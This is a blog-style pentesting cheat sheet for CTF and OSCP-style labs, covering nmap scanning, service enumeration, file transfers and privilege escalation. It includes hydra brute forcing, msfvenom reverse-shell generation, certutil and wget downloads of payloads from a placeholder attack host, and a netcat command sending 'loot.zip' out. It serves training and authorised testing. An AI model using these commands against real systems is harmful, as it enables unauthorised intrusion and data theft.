Hello there! After releasing my Active Directory cheat sheet I’ve had a few requests to do one that covers a broad spectrum of pentesting. So here it is! It’s not an in-depth guide, just a simple cheat sheet that shows what I personally do for my basic scanning, enumeration, and approaches to privilege escalation.
This guide is more for those that already have a foundation in pentesting/CTFs (i.e. if you’re capable of exploiting some easy HTB machines, maybe you’ve done a few THM rooms, maybe been through the PWK course, etc.) and just need something to refer back to if you’re stuck and completely blanking on how to do XYZ.
Let’s get to it!
Table Of Contents
- Table Of Contents
- Initial Scanning
- Port/Service Enumeration
- File Transfers
- Privilege Escalation
The initial scanning phase is probably the most crucial aspect of pentesting. The more info you can pull from this phase, the more you have to work with. You want to identify all open ports, what services/versions these ports are running, what OS the box is running, and if possible identify how old the OS is. Sometimes you can get lucky and the nmap scan will indicate that it may be an older Windows OS, something that could be vulnerable to ETERNALBLUE/ETERNALROMANCE, etc.
nmap -n -v -sT -A <IP> [add -Pn if host appears down]
Full TCP Scan:
nmap -n -v -sT -p- -T5 <IP> [lower the -T5 if this seems too fast]
Run the first scan again with “-p <additionally discovered ports>”
Vuln scan on all discovered ports:
nmap -n -v -sT -A -p<discovered ports> <IP> --script vuln
nmap -n -v -sU <IP>
Full UDP Scan:
nmap -n -v -sU -p- -T5 <IP> [I usually only do this if I’m stuck. This takes forever]
If nmap scanning reveals open ports but not services/versions try banner grabbing:
nc -nv <IP> <PORT>
This phase is where we’re going to pull as much data/information as we can from each service/port. Some may contain sensitive files that reveal users, configurations, maybe creds, maybe OS versions, maybe it’ll reveal additionally installed software that may be exploitable later, maybe it can help get us remote access to the box, maybe there are exploits/vulnerabilities for the service version, etc..
Once you’ve run your nmap scans and got the services/versions use searchsploit or Google to find vulnerabilities/exploits:
If you find one you like (i.e. 12345.php) use searchsploit to copy it to your present working directory (PWD)
searchsploit -m 12345.php
Google “<service/version> exploit”. Try to find one on Exploit Database (EDB), these are usually pretty reliable. Also, a lot of these vulnerabilities have been exploited in previous CTFs/HTB, so I like to add “HTB” to the end of the Google search and see if I can find an example of someone exploiting it.
If there are no exploits for the services you find, it’s time to enumerate them. I’ve included a few of the most common ones I come across in CTFs below. Anything you need further help with just do a quick Google search “pentesting <xyz port/service>”. 9/10 times, I’ll go with whatever pops up in hacktricks: https://book.hacktricks.xyz/welcome/readme
Port 21 – FTP
File Transfer Protocol (FTP) is essentially a database/server that stores files. A successfully authenticated user can add, delete, or pull files to/from the server depending on their permissions.
FTP is notorious for their anonymous login capability, if anonymous login is allowed the creds will usually be “anonymous / firstname.lastname@example.org”
Log into FTP:
ftp <IP> [enter creds]
If successful, hop around the directories and see what files you can find. You can download them like “mget <filename>”. Test upload functionality in each directory as well “mput <filename>”. I’ve come across a situation in the past where the FTP server was the root of the web server, so I was able to upload a reverse shell to the FTP server and execute it by navigating to it on the website.
If you find creds later on, come back and try them on the FTP server. It may reveal files/dirs you didn’t previously have access to.
Port 22 – SSH
Secure Shell (SSH) is a method of establishing a shell connection to a remote host. You can use creds or an SSH key.
Start SSH Session:
ssh <user>@<IP> [enter password]
If you find a user’s private key (usually called id_rsa) in the .ssh folder in their home directory or somewhere else on the box copy it to your attack box and you can use it to authenticate via SSH.
ssh <user>@<IP> -i <id_rsa file>
As a last resort, you can try brute forcing your way in if you have a known user (root will pretty much always be a legit user):
hydra -V -f -l root -P /usr/share/wordlists/rockyou.txt <ip> ssh
Port 25/110/143 — SMTP/POP3/IMAP
I’m not going to provide my methodology for these ports because 9/10 times if these ports are crucial to exploitation in a CTF (and the version isn’t immediately exploitable — like one of the JAMES mail servers) then chances are you need to find a user’s creds somewhere and you’ll use these ports to login to their email client and read their emails.
Hacktricks has some good enumeration techniques for these ports, check it out if you need.
Port 53 — DNS
Domain Name System translates IPs to hostnames/domain names so you don’t need to type IP’s into your browser.
Once you discover a hostname/domain name, add it to your hosts file:
sudo nano /etc/hosts
dig axfr @<DNS_IP> [Try zone transfer without domain] dig axfr @<DNS_IP> <DOMAIN> [Try zone transfer guessing the domain] fierce --domain <DOMAIN> --dns-servers <DNS_IP> [Tries zone transfer against every authoritative name server, if it doesn’t work will try a dictionary attack]
Grab any info from records:
dig ANY @<DNS_IP> <DOMAIN> [you can replace ANY with A, AAAA, TXT, MX, NS, etc.]
nslookup server <IP> <IP>
Port 80/443 — HTTP/S
These are arguably the most critical ones to enumerate (but also sometimes the hardest). Chances are if there’s a web server, it’s going to be your entry point into the system. There may be numerous web servers to throw you off, but it’ll be one of them, or they may need to be chained together. Way too much goes into web app pentesting, so I’m just giving my basic little checklist of things to do before I have to get crazy with BurpSuite.
Use nikto to enumerate the server’s architecture and run some basic checks to see if there are any files/directories/high-level vulnerabilities that really stand out:
nikto -h <WEB_URL>
Directory brute forcing. I like to use dirbuster because I’m not too proud to use the GUI, but here are some gobuster commands I’ll use if dirbuster doesn’t give me much:
gobuster dir -u <url> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 gobuster dir -u <url> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 -x php,pl,sh,asp,html,json,py,cfm,aspx,rb,cgi
Dirbuster is super simple though. Just enter the URL, choose a wordlist, increase the threads, run it.
Always check for /robots.txt, this will give you some “hidden” directories (dirs that the site doesn’t want web spiders to find). Check out the dirs in that file if it exists, might even need to re-run your directory brute force setting those dirs as your web root.
Always check every page source for possible developer comments or references to files/directories you may not have found previously. Also could help you enumerate API/framework versions and other software/versions on the site.
If it’s using a Content Management System (CMS) try to get the name/version. Google vulnerabilities/exploits for it, or default creds. May need to reconfigure the exploit and tailor it to whatever directory the CMS is running out of.
If you can’t find creds, try SQL Injection:
If you’re at the end of the road and literally can’t find anything, try to brute force the login form using hydra. You’ll have to Google specific tutorials for it, it’s highly dependent on the application.
If you’re not taking your OSCP exam try using SQLmap. It could help bypass login, or could help pull other sensitive data that could help log you in or progress you elsewhere.
If the site is running WordPress, try wpscan. It’s gotten me admin creds in the past. Example below (use -e to enumerate everything):
wpscan --url http://10.11.1.251/wp/wp-login.php --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads=50
If the site has upload functionality, chances are this is how you’re going to get your first shell. Experiment with different file types (this is where knowing the OS comes in handy) and different naming conventions. Google “file upload pentesting” if you need a cheat sheet for file upload. Also, I’ve seen lots of beginners toss web shells onto a box and start freaking out on Reddit because their nc listener didn’t do anything.. Whether you upload a reverse shell or a web shell, you’ll need to know where the uploads get stored so you can manually navigate to the directory and execute it. The difference between a reverse shell and a web shell is that the web shell only gives you remote code execution (RCE) inside the website, whereas the reverse shell will connect back to your nc listener and give you a shell.
Port 139/445 — SMB/SAMBA
Server Message Block (SMB) is basically just a protocol that allows computers to access each other’s shares (directories/files). In Windows it’s SMB, in Linux it’s SAMBA.
If you don’t have creds try all of the enumeration techniques unauthenticated, then once you find some creds see if you can use them to re-run the enumeration and maybe some of those previously restricted shares will allow you to access them.
Enumerate everything (users, groups, shares, domains, etc.. if it works):
enum4linux -v <IP>
Manually enumerate shares:
smbclient -L \\<IP> [lists shares] smbclient \\<IP>\<share_name> [connect to share; add “-U <username>” once you get creds]
Port 389/636 — LDAP/S
LDAP is like a hierarchical phone book for Active Directory. It provides lots of info about the domain. I included some LDAP enumeration in my “Active Directory Cheat Sheet” post. For CTFs, typically the most useful thing I’ll pull from LDAP enumeration is a list of domain users and sometimes even some default passwords. I usually use crackmapexec to verify the passwords against the list of users I found.
Grab all of the naming contexts:
ldapsearch -x -h <IP> -s base namingcontexts
Once you’ve found the naming contexts, enumerate them:
ldapsearch -x -h <IP> -b ‘<naming context’ [Example] ldapsearch -x -h 10.10.10.175 -b ‘DC=EGOTISTICAL-BANK,DC=LOCAL’
There’s more you can do to narrow your search, but I usually manually check some of the entries once I search on specific naming contexts then I’ll grep for some of the more interesting items. Like if there’s an entry called “default_pw” in every entry of a specific naming context I’ll just grep for “default_pw” or grep “users” or any other interesting thing I want to grab a list of.
Port 3306 — MySQL
MySQL is a SQL database. If you find creds for it you may be able to access it from your attack box. Sometimes in a netstat on the target box you’ll see that port 3306 is listening locally.. If you have the creds you can try running these commands from the target box, or you can set up port forwarding so you can access it from your attack box.
mysql -h <IP> -u<root> -p<password> -P 3306 [access MySQL] mysql -h <IP> -u<root> -p<password> -P 3306 -e ‘show databases;’ [lists databases — don’t forget semi-colon]
Port 3389 — RDP
RDP is Remote Desktop Protocol, essentially gives you GUI access to login to another computer. If you find creds to a user and aren’t sure how else to gain access, try RDP. It’s saved me a few times.
xfreerdp /u:”<username>” /v:<IP>:3389
You can also try rdesktop, but xfreerdp has given me the most success in the past.
The above links have some resources for compiling your own reverse shells (MSFVenom) as well as simple one-liners depending on what commands your target has access to. Make sure you understand the OS you’re trying to exploit so you can rule out certain shells. For example, if you’re trying to get a reverse shell via file upload on a Windows web server you’d want to steer towards asp or aspx files, whereas a Linux web server you may want to try PHP.
If I have access to a Windows box or the web server can execute exe’s I like to make my own reverse shell to place on target:
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=4321 -f exe -o rev.exe msfvenom -a x64 --platform Windows -p windows/x64/shell/reverse_tcp LHOST=<LOCAL_IP> LPORT=4321 -f exe -o rev.exe
If you have a “dumb shell”, upgrade it:
rlwrap: a helpful command (especially for dumb Windows shells), just add rlwrap in front of your normal nc listener command:
rlwrap nc -nlvp 4321
If on a Linux box type “tty” -> if it says “not a tty”:
python -c ‘import pty; pty.spawn(“/bin/bash”)’ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
If you’re trying to transfer a file to the target, make sure you have a web server set up in the dir your file is in:
sudo python3 -m http.server <port of choice>
File transfer from a Windows box:
certutil.exe -urlcache -split -f http://<ATTACK_IP>:<WEBSERVER_PORT>/file.exe OR powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile(‘http://<ATTACK_IP>/35936.exe’, ‘C:\temp\35936.exe’)
File transfer from a Linux box:
Sometimes none of the above examples can be used, so you have to set up an SMB server on kali using impacket-smbserver [google it].
Transferring file TO attack box [I use this a lot to transfer SharpHound results]:
[from attack box] nc -lnvp 443 > loot.zip [from target box] nc -vn <ATTACK_IP> 443 < loot.zip
There is so much that goes into privilege escalation I could write several posts on specific types of privesc methods per OS. However, I’m just running through my thought process when it comes to privesc.
- run “sudo -l” [this will show you what commands can be run as root without root’s password]. If an entry exists, use GTFOBins to get the necessary command to privesc to root:
- what user are you? “whoami”
- Check all user directories in /home (use “ls -lisa” to view hidden files) for files that aren’t typically present. They may have sensitive info, indicate that there’s additional software on the box you can exploit, or the user might have an accessible SSH key in their .ssh directory. Check out .bash_history as well.
- Check /tmp for any temporary files that are abnormal to a typical Linux instance.
- Check cron jobs (linpeas.sh will do this for you)
- Check /opt for additional software installed on the box.
- Check “netstat -ano” to see what ports are listening, maybe you’ll find one only locally listening.
- If a web server is running, check /var/www/<insert web directory> for interesting files. Some may contain creds.
- Check “ps -ef” to see what processes are running as root. Maybe one of these will be what we need to take over.
- Check /etc/passwd to see which users can log into the box, in case it’s a multi-user operation and one of them doesn’t have a home directory.
- Run linpeas.sh — Parse through the output. Ones highlighted yellow are almost guaranteed to be a privesc method. Towards the bottom of the output it checks all files for creds (not 100% accurate, but it’s found creds for me in the past).
[Run linpeas.sh] cd /tmp wget http://<attack_ip>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
Chances are high that something in this enumeration will be your privesc method, it’s up to you to find and exploit it. If the intended path for exploitation wasn’t identified in any of this enumeration, Google “linux privilege escalation cheat sheet”.
I really dislike Privesc in Windows.. There are a ton of different privesc vectors, many dependent on the OS. A lot of the privesc methods I’ve come across are usually found as a result of Googling “Windows <OS version> exploit”, or it’s a software misconfiguration. It’s much less straight forward than Linux in my opinion, but it gets easier once you do it enough.
- Same as with Linux, check all of the typical directories: any user home directory, the Windows\Temp directory, if there’s a web server check all the files in the directory, check “Program Files” for additionally installed software, etc.
- Check “systeminfo” to get a lay of the land.
- Check “whoami /priv” to see what privileges the current user is assigned.
- Use windows-exploit-suggester. It just needs the output from systeminfo and it’ll suggest some exploits for you (runs locally on attack box — Google it).
- If you have trouble compiling any binaries for kernel exploits, check out binsploits. It’s a collection of pre-compiled kernel exploits. They don’t always work but have a pretty good track record.
- Run winpeas to see if it can identify anything out of the ordinary. Itcan help you identify JuicyPotato/RottenPotato, possible unquoted service paths, maybe some dll injection, etc.. There is a lot of output from winpeas, not all of it is exploitable. You’ll learn over time what continuously pops up in every scan. The goal is to find the software that isn’t typically on a regular user’s computer, then if it pops up in the unquoted service path possibilities or DLL Injections take a look at it.
- I have two one-liners I use sequentially to determine what files have weak permissions:
for /f “tokens=2 delims=’=’” %a in (‘wmic service list full^|find /i “pathname”^|find /i /v “system32”’) do @echo %a >> permissions.txt for /f eol^=^”^ delims^=^” %a in (permissions.txt) do cmd.exe /c icacls “%a”
And that’s a wrap! I know it’s not a very specific or in-depth cheat sheet, but it’s hard to cover all of the avenues and vectors without having to just write up specific guides/tutorials. Which I do plan on doing, but I’ve had a few requests for a basic pentesting cheat sheet. So here it is!